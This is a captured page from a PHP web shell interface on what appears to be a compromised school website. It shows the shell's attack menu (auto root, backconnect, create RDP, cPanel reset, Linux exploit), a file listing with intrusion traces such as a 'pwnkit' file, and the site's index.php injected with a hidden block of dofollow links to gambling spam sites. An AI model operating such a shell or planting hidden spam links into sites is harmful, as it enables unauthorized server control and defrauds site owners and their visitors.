Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.143.241.253
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
puranewala /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
files
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
myadmin
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.htaccess
197
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
about.php
13.47
KB
-rw-r--r--
academic.php
2.43
KB
-rwxr-xr-x
addmission.php
1.76
KB
-rwxr-xr-x
bootstrap.php
79.58
KB
-rw-r--r--
cbse-corner.php
3.32
KB
-rwxr-xr-x
config.php
628
B
-rwxr-xr-x
contact.php
1.8
KB
-rwxr-xr-x
error_log
251.56
MB
-rwxr-xr-x
favicon.ico
2.56
KB
-rwxr-xr-x
footer.php
6.15
KB
-rwxr-xr-x
gallery.php
1.54
KB
-rwxr-xr-x
google473647a1b3836d03.html
53
B
-rw-r--r--
header.php
10.94
KB
-rwxr-xr-x
index.php
23.28
KB
-rw-r--r--
net.html
1.72
KB
-rw-r--r--
news-coverage.php
1.32
KB
-rwxr-xr-x
prolayt.html
1.22
KB
-rw-r--r--
puranewala.zip
80.97
MB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
result.php
1.29
KB
-rwxr-xr-x
tc.php
3.14
KB
-rwxr-xr-x
wp-blog-header.php
7.93
KB
-rw-r--r--
wp-cron.php
4.57
KB
-rw-r--r--
z.htm
2.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<div class="hero-slide owl-carousel site-blocks-cover "><?php <?php include('header.php'); ?> <!--Slider Start--> <div class="hero-slide owl-carousel site-blocks-cover "><?php $qurey = "SELECT * FROM `slider` WHERE status='active'"; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <img src="/myadmin/slider/<?php echo $row['picture']; ?>"/> <?php } ?> </div> <!--Slider End--> <div></div> <!--Trust Start--> <div class="site-section"> <div class="container-fluid"> <div class="row"> <div class="col-12"> <div class="col-lg-3 col-md-3 col-sm-12 trust-box"> <figure class="thumnail"> <a href="about.php"><img src="images/santattar1.jpg" alt="Image" class="img-fluid"></a> <div class="category"> <a href="about.php"><h5>Founder</h5></a> <!--<p>Sant Attar Singh Ji, the founder of this unique institution Akal Academy, was a votary of modern scientific education duly tempered with</p>--> </div> </figure> </div> <div class="col-lg-3 col-md-3 col-sm-12 trust-box"> <figure class="thumnail"> <a href="about.php"><img src="images/Dr-Veer-Ji1.jpg" alt="Image" class="img-fluid"></a> <div class="category"> <a href="about.php"><h5>Director’s Message</h5></a> <!--<p>All great ideas begin with a commitment to the future. ‘Vision gives you the impulse to make the picture on your own</p>--> </div> </figure> </div> <div class="col-lg-3 col-md-3 col-sm-12 trust-box"> <figure class="thumnail"> <a href="about.php"><img src="images/principal.jpg" alt="Image" class="img-fluid"></a> <div class="category"> <a href="about.php"><h5>Principal's Message</h5></a> <!--<p>We have made’ Dreams transfer into thought’ and are striving to make the ‘thoughts result in action.’ </p>--> </div> </figure> </div> <div class="col-lg-3 col-md-3 col-sm-12 trust-box"> <figure class="thumnail"> <a href="javascript:void(0)"> <img src="images/school (9).jpg" alt="Image" class="img-fluid"> </a> <div class="marquee-box"> <marquee direction="up" onmouseover="this.setAttribute('scrollamount', 0, 0); this.stop();" onmouseout="this.setAttribute('scrollamount', 6, 0); this.start();" scrollamount="6" behavior="scroll" style=" line-height: 30px;"> <?php $qurey = "SELECT * FROM `news` WHERE status='active' "; $result = mysqli_query($con, $qurey); $sr_no = 1; while ($row = mysqli_fetch_array($result)) { ?> <p class="news-scroll-content"><?php echo $sr_no . '.'; ?><?php echo $row['title']; ?></p> <?php $sr_no++; } ?> </marquee> </div> <div class="category"><h5>News/ Circular</h5></div> </figure> </div> </div> </div> </div> </div> <!--Trust End--> <!--Subscribe Start--> <div class="site-section ftco-subscribe-1" style="background-image: url('images/bg_1.jpg')"> <div class="container"> <div class="row align-items-center"> <div class="dt-sc-margin25"></div> <div class="col-lg-12"><?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '1'"; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <h2 style="text-align: center;"><?php echo $row['title']; ?></h2> <p style="text-align:justify"><?php echo $row['description']; ?></p> <?php } ?> </div> <div class="col-lg-12"> <div class="event-box"> <a href="cbse-corner.php" class="dt-sc-button large"> Mandatory Public Disclosure<span class="fa fa-angle-right"></span></a> </div> </div> <div class="dt-sc-margin25"></div> </div> </div> </div> <!--Subscribe End--> <!--About Us Start--> <div class="section-bg style-1" style="background-image: url('images/about_1.jpg');"> <div class="container"> <div class="row"> <div class="col-lg-6"> <figure class="thumnail"> <img src="/images/gallery/school (22).jpg" alt="School Image" class="img-fluid"> </figure> </div> <div class="col-lg-6"><?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '2'"; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <h2 class="section-title-underline style-2"> <span><?php echo $row['title']; ?></span> </h2> <p class="lead" style="text-align:justify"><?php echo $row['description']; ?></p> <div class="dt-sc-margin25"></div> <blockquote class="type1"><q>Life in Akal Academy Puranewala focus on commitment to academic excellence, intellectual growth, arts athletics, high standards of ethical awareness, sportsmanship, and community service. Novelty and variety are added to each student’s life by the school’s countless efforts and accessibility to a board curriculum based on value based education.</q></blockquote> <?php } ?> </div> </div> </div> </div> <!--About Us End--> <!--Why Us Start--> <div class="site-section"> <div class="container-fluid"> <div class="row justify-content-center text-center"> <div class="col-lg-4"> <h2 class="section-title-underline mb-5"> <span>Our Features</span> </h2> </div> </div> <div class="row"> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-futbol-o"></span> </div> <div class="feature-1-content"> <!--<h2>Activities</h2> <p></p>--> <p><a href="#" class="btn btn-primary px-4 rounded-0">Activities</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-bus"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">School bus</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-users"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">Kids Play Land</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-graduation-cap"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">Learning</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-clock-o"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">School Timing</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-cloud"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">Environment</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-user"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">Educators</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-sun-o"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">Daycare</a></p> </div> </div> </div> </div> </div> </div> <!--Features End--> <!--Why Us Start--> <div class="section-bg style-1"> <div class="container"> <div class="row"> <div class="col-lg-6"> <h2 class="section-title-underline style-2" style="text-align: center;"> <span>Why Choose Us?</span> </h2> <div class="dt-sc-margin25"></div><?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '4' "; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <button class="accordion"><?php echo $row['title']; ?></button> <div class="panel"> <p style="text-align:justify"><?php echo $row['description']; ?></p> </div> <?php } ?> <?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '5' "; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <button class="accordion"><?php echo $row['title']; ?></button> <div class="panel"> <p style="text-align:justify"><?php echo $row['description']; ?></p> </div> <?php } ?> <?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '6' "; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <button class="accordion"><?php echo $row['title']; ?></button> <div class="panel"> <p style="text-align:justify"><?php echo $row['description']; ?></p> </div> <?php } ?> <?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '7' "; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <button class="accordion"><?php echo $row['title']; ?></button> <div class="panel"> <p style="text-align:justify"><?php echo $row['description']; ?></p> </div> <?php } ?> </div> <div class="col-lg-6"> <h2 class="section-title-underline style-2" style="text-align: center;"> <span>Gallery</span> </h2> <div class="dt-sc-margin25"></div> <div class="slideshow-container"> <div class="mySlides fade"> <img src="/images/gallery/school (1).jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/gallery/school (2).jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/gallery/school (3).jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/gallery/school (4).jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/gallery/school (5).jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/gallery/school (6).jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/gallery/school (7).jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/gallery/school (8).jpg" style="width:100%"> </div> <a class="prev" onclick="plusSlides(-1)">❮</a> <a class="next" onclick="plusSlides(1)">❯</a> </div> </div> </div> </div> </div> <!--Why Us End--> <!--opportunities Start--> <div class="section-bg"> <div class="container-fluid"> <div class="row"> <div class="col-lg-6"><?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '3'"; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <h2 class="section-title-underline" style="text-align: center;"> <span><?php echo $row['title']; ?></span> </h2> <p class="lead" style="text-align:justify"><?php echo $row['description']; ?></p> <?php } ?> </div> <div class="col-lg-6"> <figure class="thumnail" style="text-align: center;"> <img src="/images/gallery/school (28).jpg" alt="School Image" class="img-fluid" width="600"> </figure> </div> </div> </div> </div> <div style="display:none"> <a href="https://www.regard-horus.fr/" rel="dofollow">Uno89 Slot Server Luar</a> <a href="https://tutophta.com/" rel="dofollow">UNO89 Dana Slot88</a> <a href="https://nutricion-horuspharma.es/" rel="dofollow">Uno89 Info Slot Gacor</a> <a href="https://www.dermatologie-horus.com/" rel="dofollow">UNO89 Daftar Situs Slot Gacor</a> <a href="https://www.micronutrition-horuspharma.be/" rel="dofollow">UNO89 SLOT DANA MAXWIN</a> <a href="https://www.complementalimentaire-horus.com/" rel="dofollow">SLOT GACOR MENANG MAXWIN</a> <a href="https://www.mon-omd.fr/" rel="dofollow">Engine Nexus Slot</a> <a href="https://colegiomariazambrano.com/" rel="dofollow">Daftar Slot Gacor Terpercaya</a> <a href="https://torremesa.com/" rel="dofollow">UNO89</a> <a href="https://puntolimpiosanlucar.es/" rel="dofollow">UNO89</a> <a href="https://smartsystems-eg.com/" rel="dofollow">Situs Slot Gacor</a> <a href="https://www.residence-ajaccio.com/" rel="dofollow">Link Slot Gacor</a> <a href="https://www.hindvabuilders.com/" rel="dofollow">UNO89 LOGIN</a> <a href="https://thaimary.com/" rel="dofollow">UNO89 SLOT LOGIN</a> <a href="https://cmjhospital.in/" rel="dofollow">Situs Slot Gacor Terpercaya</a> <a href="https://www.daruvarske-toplice.hr/" rel="dofollow">Slot Gacor Terpercaya Pasti Menang</a> <a href="https://litgo-healthysnack.com/" rel="dofollow">Slot Gacor Sugar Rush</a> <a href="https://backpackexplore.com/" rel="dofollow">Uno89 Slot</a> <a href="https://gkipakola.org/" rel="dofollow">link situs gacor slot777</a> <a href="https://saintpaulpublicschool.in/" rel="dofollow">uno89</a> <a href="https://firststatebrewers.com/" rel="dofollow">Uno89 Slot Gacor Mxwin</a> <a href="https://www.shamotoeyeclinic.com/" rel="dofollow">uno89</a> <a href="https://guinchozonaleste.com/" rel="dofollow">BINGO89</a> <a href="https://thebathroommerchants.com/" rel="dofollow">BINGO89</a> <a href="https://glovesforbbq.com/" rel="dofollow">BINGO89</a> <a href="https://herramientasrenzomilani.com/" rel="dofollow">Bingo89 Login</a> <a href="https://tochkamassazha.ru/" rel="dofollow">Bingo89 Slot</a> <a href="https://reflectionwindow.com/" rel="dofollow">Link Slot Gacor</a> <a href="https://opstinavisegrad.com/" rel="dofollow">Situs Slot Gacor 777</a> <a href="https://cinecec.com/" rel="dofollow">Situs Slot Gacor</a> <a href="https://www.alritrovoshop.it/" rel="dofollow">Bingo89 Slot Gacor Maxwin</a> <a href="https://www.prsteny-prstynky.cz/" rel="dofollow">Daftar Bingo89 Slot Online</a> <a href="https://spaceforworld.com/" rel="dofollow">bingo89</a> <a href="https://cocktailswithyou.com/" rel="dofollow">bingo89</a> <a href="https://radientray.com/" rel="dofollow">bingo89</a> <a href="https://shinepukurt.com/" rel="dofollow">bingo89</a> <a href="https://learnfromtopratedfreelancer.com/" rel="dofollow">bingo89</a> <a href="https://suitablefeed.com/" rel="dofollow">bingo89</a> <a href="https://starsbiopoint.com/" rel="dofollow">bingo89</a> <a href="https://thekeyphrase.com/" rel="dofollow">bingo89</a> <a href="https://motionclever.com/" rel="dofollow">bingo89</a> <a href="https://re-biking.com/" rel="dofollow">horemenang</a> <a href="https://chul.ca/" rel="dofollow">horemenang</a> <a href="https://technohridoy.com/" rel="dofollow">horemenang</a> <a href="https://ascenaentertainment.com/" rel="dofollow">oyuki88 slot gacor</a> <a href="https://awsomefeed.com/" rel="dofollow">Oyuki88 Slot</a> <a href="https://newoutdoorlifestyle.com/" rel="dofollow">Oyuki88 Slot</a> <a href="https://onepointclick.com/" rel="dofollow">Oyuki88 Slot</a> <a href="https://gotechshine.com/" rel="dofollow">Oyuki88 Slot</a> <a href="https://medievaltechshine.com/" rel="dofollow">Oyuki88 Slot</a> <a href="https://fusionliveentertainment.com/" rel="dofollow">Oyuki88 Slot</a> <a href="https://sunburnfeed.com/" rel="dofollow">Oyuki88 Slot</a> <a href="https://sgrlogistic.xyz/" rel="dofollow">OYUKI88</a> <a href="https://loopmediapune.xyz/" rel="dofollow">OYUKI88</a> <a href="https://prevailtrip.xyz/" rel="dofollow">OYUKI88</a> <a href="https://www.deskworksol.com/" rel="dofollow">OYUKI88</a> <a href="https://digitalsanchita.live/" rel="dofollow">OYUKI88</a> <a href="https://beautygarage.gr/" rel="dofollow">OYUKI88</a> <a href="https://login.bingo89-bingo89.lat/" rel="dofollow">Link Slot Gacor</a> <a href="https://login.uno89-uno89.lat/" rel="dofollow">Link Slot Online</a> <a href="https://uno-uno89.tumblr.com/" rel="dofollow">https://uno-uno89.tumblr.com/</a> <a href="https://ini-bingo89.tumblr.com/" rel="dofollow">https://ini-bingo89.tumblr.com/</a> <a href="https://www.facebook.com/bingo89indonesia" rel="dofollow">Bingo89</a> <a href="https://www.facebook.com/gaming/uno89indonesia" rel="dofollow">Uno89</a> <a href="https://direct.me/uno89nih" rel="dofollow">UNO89</a> <a href="https://direct.me/bingo89nih" rel="dofollow">BINGO89</a> <a href="https://heylink.me/officialuno89/" rel="dofollow">https://heylink.me/officialuno89/</a> <a href="https://heylink.me/bingo89/" rel="dofollow">https://heylink.me/bingo89/</a> <!--opportunities End--> <!--Picture Start--> <div class="section back-box"> <div class="container-fluid"> <div class="row"> <div class="col-lg-12"> <figure class="thumnail" style="text-align: center;"> <img src="images/Tree (1).png" alt="School Image" class="img-fluid" width="800"> </figure> </div> </div> </div> </div> <!--Picture End--> <?php include('footer.php'); ?>
Close